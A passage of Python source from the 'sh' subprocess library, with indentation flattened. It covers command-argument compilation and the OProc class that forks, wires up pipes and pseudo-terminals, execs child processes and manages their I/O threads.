fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, exc_type, exc_val, exc_tb):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# exec'ed
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
cwd = call_args["cwd"] or os.getcwd()
with pushd(cwd):
if call_args["env"] is None:
exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(a, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and compose them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in a:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
# see https://github.com/amoffat/sh/issues/522
elif arg is None or arg is False:
pass
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
essentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
def _start_daemon_thread(fn, name, exc_queue, *a):
def wrap(*rgs, **kwargs):
try:
fn(*rgs, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thread = threading.Thread(target=wrap, name=name, args=a)
thread.daemon = True
thread.start()
return thread
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
winsize = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, winsize, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
a = handler_args
if len(a) == 2:
a = (handler_args[0], handler_args[1]())
return handler(chunk, *a)
return fn
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr, call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
else:
target_uid, target_gid = None, None
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is os.dup'ed
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
else:
close_pipe_read, close_pipe_write = None, None
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which is impossible to know because but what if os.execv has an exception? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except: # noqa: E722
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024 ** 2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read, 1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd, self.stdin,
ca["in_bufsize"], ca["encoding"], ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and (tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's file descriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout
)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and (ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(
Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr
)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"], self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(
background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads
)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(
input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term
)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and os.dup's the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(
output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event
)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_parent_fd and not self._stdin_stream:
os.close(self._stdin_parent_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait", self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit_thread, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit_thread.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive, quit_thread):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit_thread.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
exit_code = None
while alive:
quit_thread.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit_thread, stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
